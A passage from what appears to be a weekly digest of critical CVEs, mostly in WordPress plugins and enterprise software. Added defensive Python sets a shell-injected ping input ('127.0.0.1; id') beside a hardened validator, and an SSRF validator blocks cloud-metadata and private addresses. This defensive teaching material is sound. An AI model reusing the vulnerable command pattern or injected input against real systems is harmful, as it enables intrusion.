Product: DataEase
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64164

CVE-2025-27918 – AnyDesk before 9.0.0 is vulnerable to a heap-based buffer overflow due to an integer overflow in UDP packet processing.
Product: Anydesk
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27918

CVE-2025-64180 – Manager-io/Manager accounting software is vulnerable to unauthorized access to internal network resources due to a flaw in its DNS validation mechanism, allowing attackers to bypass network isolation and access internal services and protected network segments.
Product: Manager-io Manager
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64180
NVD References: https://github.com/Manager-io/Manager/security/advisories/GHSA-j2xj-xhph-p74j

CVE-2025-63689 – Ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) is vulnerable to multiple SQL injection attacks, enabling remote attackers to execute arbitrary code through the orderby parameter.
Product: ycf1998 money-pos system
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63689

CVE-2025-63690 – Pig-mesh Pig versions 3.8.2 and below suffer from a remote code execution vulnerability due to insecure handling of scheduled tasks in the Quartz management function.
Product: pig-mesh Pig
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63690

CVE-2025-63691 – In pig-mesh Pig version 3.8.2 and below, there is an improper permission verification vulnerability in the Token Management function, allowing ordinary users to gain administrator access and take over the system.
Product: pig-mesh Pig
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63691

CVE-2025-10230 – Samba is vulnerable to remote code execution due to unsanitized NetBIOS name data being passed to a shell command without proper validation.
Product: Samba Active Directory Domain Controller
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-10230
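Several entries in this list are the same bug class: attacker-controlled text (a crafted IP address in the Dynatrace ActiveGate ping extension, CVE-2025-61304; a NetBIOS name in Samba, CVE-2025-10230; crafted HTTP requests or CLI commands in FortiWeb, CVE-2025-58034) is concatenated into a command line that a shell later interprets. The example below is added here and is not code from any of those products. It shows the vulnerable pattern next to a hardened version that validates the value as an IP address or RFC 1123 hostname and passes it as its own argv element with no shell; the ping command line is the assumed target, and the grammar check doubles as option-injection protection because a value cannot start with “-”.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname labels: letters, digits and hyphens, no leading or trailing
# hyphen. No whitespace, quotes, ';', '|', '$(' or backticks can pass this, and
# a leading '-' is excluded so ping cannot be handed an option instead of a host.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile("^" + _LABEL + r"(?:\." + _LABEL + r")*\.?$")


def build_ping_vulnerable(target: str) -> str:
    """The pattern behind the CVEs above: untrusted input interpolated into a
    command line that is later handed to a shell (e.g. subprocess.run(cmd,
    shell=True) or os.system). Shown only to make the attacker's string
    visible; do not use."""
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    """Return target unchanged if it is a literal IP address or a hostname,
    otherwise raise ValueError. Allow-list by grammar, never block-list
    metacharacters: the set of characters a shell treats specially is larger
    than any deny list you will remember."""
    if len(target) > 253:
        raise ValueError("target too long")
    try:
        ipaddress.ip_address(target)      # IPv4 or IPv6 literal
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"not an IP address or hostname: {target!r}")


def build_ping_safe(target: str) -> list[str]:
    """Hardened form: validated value, passed as one argv element, no shell."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str, timeout: float = 5.0) -> int:
    """Execute the hardened form (shell=False is the subprocess default for a
    list) and return ping's exit status; raises ValueError on bad input."""
    proc = subprocess.run(build_ping_safe(target), capture_output=True, timeout=timeout)
    return proc.returncode


if __name__ == "__main__":
    payload = "127.0.0.1; id"              # constructed attacker input
    print("shell would run:", build_ping_vulnerable(payload))
    try:
        build_ping_safe(payload)
    except ValueError as exc:
        print("rejected:", exc)
    print("argv:", build_ping_safe("192.0.2.1"))
```

The argv list alone is not sufficient: if the validation were dropped, a target of “-f” would still reach ping as a flag, which is why the grammar check rejects a leading hyphen rather than relying on the absence of a shell.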

CVE-2025-12866 – EIP Plus developed by Hundred Plus is vulnerable to a Weak Password Recovery Mechanism, allowing remote attackers to predict or brute-force the ‘forgot password’ link and reset any user’s password.
Product: Hundred Plus EIP Plus
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12866
NVD References: https://www.twcert.org.tw/en/cp-139-10491-004b0-2.html

CVE-2025-12868 – New Site Server developed by CyberTutor is vulnerable to unauthenticated remote attackers exploiting a Use of Client-Side Authentication flaw to gain administrator privileges on the website.
Product: CyberTutor New Site Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12868
NVD References: https://www.twcert.org.tw/en/cp-139-10492-84a10-2.html

CVE-2025-64689 – In JetBrains YouTrack before 2025.3.104432, a misconfiguration in Junie could lead to exposure of the global Junie token.
Product: JetBrains YouTrack
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64689
NVD References: https://www.jetbrains.com/privacy-security/issues-fixed/

CVE-2025-64522 – Soft Serve 0.11.1 and earlier versions are vulnerable to SSRF attacks due to inadequate validation of webhook URLs, enabling repository admins to target internal services and cloud metadata endpoints.
Product: Soft Serve Git server
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64522
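Four entries across these two issues are server-side request forgery in outbound-request features, each defeated at a different step: Typebot (CVE-2025-64709) let a request reach the instance metadata service and hand out node-role credentials, DataEase (CVE-2025-64163) checked some schemes but not dns://, Manager (CVE-2025-64180) validated a name whose resolution later changed, and Soft Serve (CVE-2025-64522) did not validate webhook URLs at all. The validator below is an added example, not code from any of those projects. It restricts the scheme, resolves the hostname once, rejects the request if any answer falls in private, loopback, link-local or multicast space (which covers 169.254.169.254 and the EC2 IPv6 metadata address fd00:ec2::254), and returns the resolved address for the caller to pin the connection to. The zone data and the demo resolver are constructed so the block runs offline; only resolve_all uses the real system resolver.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Address space an outbound-request feature must never be allowed to reach.
# 169.254.169.254 (AWS/Azure/GCP instance metadata) is inside the link-local
# block; fd00:ec2::254 (EC2 IPv6 metadata) is inside fc00::/7.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.168.0.0/16",
    "198.18.0.0/15", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8", "::ffff:0:0/96",
)]


def is_blocked_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # ::ffff:169.254.169.254 is the metadata address in IPv6 clothing; check
    # the IPv4 it wraps so the v4 ranges apply to it as well.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def resolve_all(host: str) -> list[str]:
    """Every A/AAAA answer for host from the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_outbound_url(url: str, resolver=resolve_all):
    """Return (pinned_ip, reason); pinned_ip is None when the URL is rejected.

    The caller must connect to pinned_ip (sending the original hostname as the
    Host header / SNI) instead of resolving the name a second time: a second
    lookup can return a different, internal address (DNS rebinding), which is
    how a validation check that only looks at the name gets bypassed."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:          # e.g. malformed bracketed IPv6 host
        return None, f"malformed URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return None, "credentials in URL are not allowed"
    host = parts.hostname
    if not host:
        return None, "missing host"
    try:
        ipaddress.ip_address(host)     # literal address: nothing to resolve
        ips = [host]
    except ValueError:
        # Not a literal in Python's parser; note that the OS resolver will
        # still turn forms like "2130706433" into 127.0.0.1, which is why the
        # check is applied to the resolved answers, not to the string.
        try:
            ips = resolver(host)
        except OSError as exc:
            return None, f"resolution failed for {host}: {exc}"
        if not ips:
            return None, f"{host} did not resolve"
    # Reject if ANY answer is blocked: an attacker-controlled zone can return
    # one public and one internal address and let the client pick.
    for ip in ips:
        if is_blocked_ip(ip):
            return None, f"{host} resolves to blocked address {ip}"
    return ips[0], "ok"


# Constructed zone standing in for DNS so the example runs offline.
DEMO_ZONE = {
    "app.example": ["203.0.113.10"],
    "metadata.internal.example": ["169.254.169.254"],
    "split.example": ["203.0.113.10", "10.0.0.5"],
}


def demo_resolver(host: str) -> list[str]:
    if host in DEMO_ZONE:
        return DEMO_ZONE[host]
    raise OSError(f"NXDOMAIN {host}")


if __name__ == "__main__":
    for u in ("https://app.example/hook",
              "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
              "http://[fd00:ec2::254]/", "dns://10.0.0.1/",
              "http://split.example/", "http://[::ffff:169.254.169.254]/"):
        print(u, "->", validate_outbound_url(u, demo_resolver))
```

Pinning the resolved address closes the time-of-check/time-of-use window but moves the Host header and TLS SNI handling onto the caller; the same check must also run on every redirect target, since a 302 from an allowed host to the metadata address is the usual way around a validator that only inspects the first URL. On AWS, requiring IMDSv2 on the nodes is a second, independent layer.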

CVE-2025-42887 – SAP Solution Manager is vulnerable to code injection by authenticated attackers through remote-enabled function modules, potentially granting full system control and severely impacting confidentiality, integrity, and availability.
Product: SAP Solution Manager
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42887

CVE-2025-42890 – SQL Anywhere Monitor (Non-GUI) has credentials hard-coded into its code, allowing unintended users to access resources and potentially execute arbitrary code, posing a high risk to system security.
Product: SAP SQL Anywhere Monitor
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42890

CVE-2025-8324 – Zohocorp ManageEngine Analytics Plus versions 6170 and below are vulnerable to Unauthenticated SQL Injection due to improper filter configuration.
Product: Zohocorp ManageEngine Analytics Plus
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8324

CVE-2025-13032 – Avast/AVG Antivirus <25.3 on Windows is vulnerable to a double fetch in the sandbox kernel driver, allowing local attackers to escalate privileges via pool overflow.
Product: Avast AVG Antivirus
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13032

CVE-2025-60716 – Use after free in Windows DirectX allows an authorized attacker to elevate privileges locally.
Product: Microsoft Windows DirectX
CVSS Score: 7.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60716
ISC Diary: https://isc.sans.edu/diary/32468
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60716

CVE-2025-62199 – Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.
Product: Microsoft Office
CVSS Score: 7.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62199
ISC Diary: https://isc.sans.edu/diary/32468
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62199

CVE-2025-62215 – Windows Kernel is vulnerable to race conditions that can be exploited by an authorized attacker to locally elevate privileges.
Product: Microsoft Windows Kernel
CVSS Score: 7.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62215
ISC Diary: https://isc.sans.edu/diary/32468
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62215

CVE-2025-11007 & CVE-2025-11008 – The CE21 Suite plugin for WordPress allows unauthenticated attackers to update API settings and create new admin accounts (CVE-2025-11007) and is vulnerable to Sensitive Information Exposure through the log file, allowing unauthenticated attackers to extract sensitive data and potentially take over a site (CVE-2025-11008).
Product: WordPress CE21 Suite plugin
Active Installations: This plugin has been closed as of October 30, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11007
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11008
NVD References:
https://www.wordfence.com/threat-intel/vulnerabilities/id/5e24feac-1812-45d7-b3c3-27787eed1cf1?source=cve
https://www.wordfence.com/threat-intel/vulnerabilities/id/91aa86d9-8e42-4deb-b6ca-c3b388fefcb1?source=cve

CVE-2025-12158 – The Simple User Capabilities plugin for WordPress allows unauthenticated attackers to elevate user roles to administrator due to missing capability checks.
Product: WordPress Simple User Capabilities plugin
Active Installations: This plugin has been closed as of October 30, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12158
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/dd75b8ec-1961-4a7a-92e6-1517e638974b?source=cve

CVE-2025-12493 – The ShopLentor plugin for WordPress is vulnerable to Local File Inclusion up to version 3.2.5, allowing unauthenticated attackers to execute arbitrary .php files on the server.
Product: ShopLentor WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution (formerly WooLentor)
Active Installations: 100,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12493
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/12bb4bb9-e908-43ad-8fb1-59418580f5e1?source=cve

CVE-2025-12682 – The Easy Upload Files During Checkout plugin for WordPress allows unauthenticated attackers to upload arbitrary JavaScript files, leading to potential remote code execution.
Product: WordPress Easy Upload Files During Checkout plugin
Active Installations: 600+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12682
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/6a050764-0ba6-49a4-bd71-f79e3129fc4c?source=cve

CVE-2025-11749 – The AI Engine plugin for WordPress up to version 3.1.3 is vulnerable to Sensitive Information Exposure via the /mcp/v1/ REST API endpoint, allowing attackers to extract and misuse the bearer token for privilege escalation.
Product: WordPress AI Engine plugin
Active Installations: 100,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11749
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/06eaf624-aedf-453d-8457-d03a572fac0d?source=cve

CVE-2025-12674 – The KiotViet Sync plugin for WordPress allows unauthenticated attackers to upload arbitrary files and potentially achieve remote code execution.
Product: KiotViet Sync plugin for WordPress
Active Installations: This plugin has been closed as of November 4, 2025 and is not available for download. This closure is permanent. Reason: Author Request.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12674
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/7fdd670f-2a71-4c1d-af46-f0fd05352f7e?source=cve

CVE-2025-32222 – The Widgetlogic.org Widget Logic plugin allows attackers to inject malicious code, affecting versions from n/a through <= 6.0.5.
Product: Widgetlogic.org Widget Logic
Active Installations: 100,000+
Update to version 6.0.6 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-32222
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/widget-logic/vulnerability/wordpress-widget-logic-6-0-5-remote-code-execution-rce-vulnerability

CVE-2025-39463 – Select-Themes Dessau (dessau) is vulnerable to PHP Local File Inclusion due to improper control of filename for include/require statement in a PHP program.
Product: Select-Themes Dessau
Active Installations: Unknown. Update to version 1.9 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39463
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/dessau/vulnerability/wordpress-dessau-theme-1-9-local-file-inclusion-vulnerability

CVE-2025-39466 – Mikado-Themes Dør (dor) allows PHP Local File Inclusion due to an Improper Control of Filename for Include/Require Statement in PHP Program vulnerability.
Product: Mikado-Themes Dør
Active Installations: Unknown. Update to version 2.4.1 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39466
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/dor/vulnerability/wordpress-doer-2-4-local-file-inclusion-vulnerability

CVE-2025-39467 – Mikado-Themes Wanderland is vulnerable to Path Traversal allowing PHP Local File Inclusion, affecting versions from n/a through <= 1.7.1.
Product: Mikado-Themes Wanderland
Active Installations: Unknown. Update to version 1.7.2 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39467
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/wanderland/vulnerability/wordpress-wanderland-1-7-1-local-file-inclusion-vulnerability

CVE-2025-39468 – Modal Survey by pantherius is vulnerable to PHP Remote File Inclusion, affecting versions from n/a through <= 2.0.2.0.1.
Product: Pantherius Modal Survey
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39468
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/modal-survey/vulnerability/wordpress-modal-survey-plugin-2-0-2-0-1-local-file-inclusion-vulnerability

CVE-2025-47588 – Aco-woo-dynamic-pricing plugin allows code injection in versions from n/a through <= 4.5.9.
Product: Acowebs Dynamic Pricing With Discount Rules for WooCommerce
Active Installations: 6,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47588
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/aco-woo-dynamic-pricing/vulnerability/wordpress-dynamic-pricing-with-discount-rules-for-woocommerce-plugin-4-5-9-arbitrary-code-execution-vulnerability

CVE-2025-48086 – The Ajax Search Lite plugin is vulnerable to deserialization of untrusted data, allowing object injection, affecting versions from n/a through 4.13.3.
Product: wpdreams Ajax Search Lite
Active Installations: 80,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48086
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/ajax-search-lite/vulnerability/wordpress-ajax-search-lite-plugin-4-13-3-php-object-injection-vulnerability

CVE-2025-48089 – Rainbow-Themes Education WordPress Theme | HiStudy (histudy) is vulnerable to SQL Injection, allowing attackers to inject and execute malicious SQL.
Product: Rainbow-Themes Education WordPress Theme | HiStudy
Active Installations: Unknown. Update to version 3.1.0 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48089
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/histudy/vulnerability/wordpress-education-wordpress-theme-histudy-theme-3-1-0-sql-injection-vulnerability

CVE-2025-48290 – bslthemes Kinsley allows remote attackers to include and execute arbitrary files via the filename parameter in a PHP include/require statement, potentially leading to unauthorized access or code execution.
Product: bslthemes Kinsley
Active Installations: Unknown. Update to version 3.4.5 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48290
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/kinsley/vulnerability/wordpress-kinsley-theme-3-4-4-local-file-inclusion-vulnerability

CVE-2025-48330 – Real Time Validation for Gravity Forms <= 1.7.0 allows PHP Local File Inclusion via an improper control of filename for include/require statement vulnerability.
Product: Daman Jeet Real Time Validation for Gravity Forms
Active Installations: 2,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48330
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/real-time-validation-for-gravity-forms/vulnerability/wordpress-real-time-validation-for-gravity-forms-1-7-0-local-file-inclusion-vulnerability

CVE-2025-49386 – Preserve Code Formatting is vulnerable to Object Injection via Deserialization of Untrusted Data in versions n/a through 4.0.1.
Product: Scott Reilly Preserve Code Formatting
Active Installations: 500+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-49386
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/preserve-code-formatting/vulnerability/wordpress-preserve-code-formatting-plugin-4-0-1-php-object-injection-vulnerability

CVE-2025-49393 – Fetch Designs Sign-up Sheets is vulnerable to Object Injection through deserialization of untrusted data, affecting versions from n/a through <= 2.3.2.
Product: Fetch Designs Sign-up Sheets
Active Installations: 1,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-49393
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/sign-up-sheets/vulnerability/wordpress-sign-up-sheets-plugin-2-3-2-php-object-injection-vulnerability

CVE-2025-53242 – Deserialization of Untrusted Data vulnerability in VictorThemes Seil (seil) allows Object Injection. This issue affects Seil: from n/a through <= 1.7.1.
Product: VictorThemes Seil
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53242
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/seil/vulnerability/wordpress-seil-theme-1-7-1-deserialization-of-untrusted-data-vulnerability

CVE-2025-53252 – Zegen allows PHP Local File Inclusion, presenting a vulnerability in versions from n/a through 1.1.9.
Product: zozothemes Zegen
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53252
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/zegen/vulnerability/wordpress-zegen-theme-1-1-9-local-file-inclusion-vulnerability

CVE-2025-53283 – Drop Uploader for CF7 – Drag&Drop File Uploader Addon allows for unrestricted upload of files with dangerous types, potentially enabling the upload of a web shell to a web server.
Product: borisolhor Drop Uploader for CF7 – Drag&Drop File Uploader Addon
Active Installations: Unknown.
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53283
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/drop-uploader-for-contact-form-7-dragdrop-file-uploader-addon/vulnerability/wordpress-drop-uploader-for-cf7-drag-drop-file-uploader-addon-plugin-2-4-1-arbitrary-file-upload-vulnerability

CVE-2025-53586 – Deserialization of Untrusted Data vulnerability in NooTheme WeMusic (noo-wemusic) allows Object Injection. This issue affects WeMusic: from n/a through <= 1.9.1.
Product: NooTheme WeMusic
Active Installations: Unknown. Update to version 1.9.2 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53586
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/noo-wemusic/vulnerability/wordpress-wemusic-theme-1-9-1-php-object-injection-vulnerability

CVE-2025-58595 – The Saad Iqbal All In One Login (change-wp-admin-login) plugin allows identity spoofing due to an authentication bypass vulnerability, impacting versions from n/a through 2.0.8.
Product: Saad Iqbal All In One Login
Active Installations: 70,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58595
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/change-wp-admin-login/vulnerability/wordpress-all-in-one-login-plugin-2-0-8-bypass-vulnerability-vulnerability

CVE-2025-60195 – Incorrect Privilege Assignment vulnerability in Vito Peleg Atarim (atarim-visual-collaboration) allows Privilege Escalation. This issue affects Atarim: from n/a through <= 4.2.
Product: Vito Peleg Atarim
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60195
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-privilege-escalation-vulnerability

CVE-2025-62016 – Unrestricted Upload of File with Dangerous Type vulnerability in hogash Kallyas (kallyas). This issue affects Kallyas: from n/a through <= 4.22.0.
Product: hogash Kallyas
Active Installations: Unknown. Update to version 4.23.0 or later.
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62016
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-22-0-arbitrary-file-upload-vulnerability

CVE-2025-62047 – Case Addons is vulnerable to unrestricted upload of files with dangerous types in versions from n/a through < 1.3.0.
Product: Case-Themes Case Addons
Active Installations: Unknown. Update to version 1.3.0 or later.
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62047
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/case-addons/vulnerability/wordpress-case-addons-plugin-1-3-0-arbitrary-file-upload-vulnerability

CVE-2025-62064 – Elated-Themes Search & Go is vulnerable to password recovery exploitation through an alternate path or channel, affecting versions from n/a through 2.7.
Product: Elated-Themes Search & Go
Active Installations: Unknown. Update to version 2.8 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62064
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/search-and-go/vulnerability/wordpress-search-go-theme-2-7-broken-authentication-vulnerability

CVE-2025-62065 – Unrestricted Upload of File with Dangerous Type vulnerability in Rometheme RTMKit (rometheme-for-elementor). This issue affects RTMKit: from n/a through <= 1.6.5.
Product: Rometheme RTMKit
Active Installations: 40,000+
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62065
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/rometheme-for-elementor/vulnerability/wordpress-rtmkit-plugin-1-6-5-arbitrary-file-upload-vulnerability

CVE-2025-6325 & CVE-2025-6327 – KingAddons.com King Addons for Elementor allows Privilege Escalation due to an Incorrect Privilege Assignment vulnerability, affecting versions from n/a through 51.1.36 (CVE-2025-6325), and also allows the unrestricted upload of files with dangerous types, potentially allowing a web shell to be uploaded to the web server (CVE-2025-6327).
Product: KingAddons.com King Addons for Elementor
Active Installations: 10,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-6325
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-6327
NVD References:
https://vdp.patchstack.com/database/Wordpress/Plugin/king-addons/vulnerability/wordpress-king-addons-for-elementor-plugin-51-1-36-privilege-escalation-vulnerability
https://vdp.patchstack.com/database/Wordpress/Plugin/king-addons/vulnerability/wordpress-king-addons-for-elementor-plugin-51-1-36-arbitrary-file-upload-vulnerability

CVE-2025-12352 – The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads allowing unauthenticated attackers to potentially execute remote code.
Product: WordPress Gravity Forms
Active Installations: Unknown. Update to version 2.9.21 or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12352
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/42525101-6196-40b9-90e7-c7f1886ef247?source=cve

CVE-2025-11170 – The cpi-wp-migration plugin for WordPress allows unauthenticated attackers to upload arbitrary files on the server, potentially leading to remote code execution.
Product: cpi-wp-migration (CPI) plugin for WordPress
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11170
NVD References:
https://wordpress.org/plugins/cpi-wp-migration/
https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve

CVE-2025-12813 – The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution up to version 7.1 through the ‘contents’ parameter, allowing unauthenticated attackers to execute code on the server.
Product: WordPress Holiday class post calendar plugin
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12813
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/7f7968c4-589c-4949-9f69-4a0ba4db4ea9?source=cve

CVE-2025-12539 – The TNC Toolbox: Web Performance plugin for WordPress is vulnerable to Sensitive Information Exposure due to storing cPanel API credentials in unprotected files, allowing attackers to compromise the hosting environment.
Product: TNC Toolbox Web Performance plugin for WordPress
Active Installations: 800+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12539
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/2eaa5a5c-c11f-40d0-be69-c3ec8029a819?source=cve
